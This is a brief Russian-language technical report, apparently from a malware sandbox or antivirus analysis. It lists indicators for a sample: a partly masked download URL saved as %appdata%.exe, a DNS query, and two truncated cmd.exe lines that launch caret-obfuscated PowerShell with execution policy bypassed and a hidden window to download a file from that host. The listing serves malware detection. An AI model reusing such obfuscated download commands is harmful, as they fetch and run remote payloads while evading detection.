Техническая информация
- http://www.ap###styc.top/search.php?f=###### как %appdata%.exe
- DNS ASK ap###styc.top
- '<SYSTEM32>\cmd.exe' /c P^O^weRs^he^ll.^eXe -execU^t^iOnpol^i^c^y ^bYP^a^ss^ ^-Nopr^o^f^i^le^ ^-w^i^n^dOws^tYle ^hi^d^d^en^ ^(new-^OB^Jec^t sys^tem.Net^.^we^bcL^I^e^Nt)^.^do^w^Nloa^d^file('http://www.ap###sty...' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c P^O^weRs^he^ll.^eXe -execU^t^iOnpol^i^c^y ^bYP^a^ss^ ^-Nopr^o^f^i^le^ ^-w^i^n^dOws^tYle ^hi^d^d^en^ ^(new-^OB^Jec^t sys^tem.Net^.^we^bcL^I^e^Nt)^.^do^w^Nloa^d^file('http://www.ap###sty...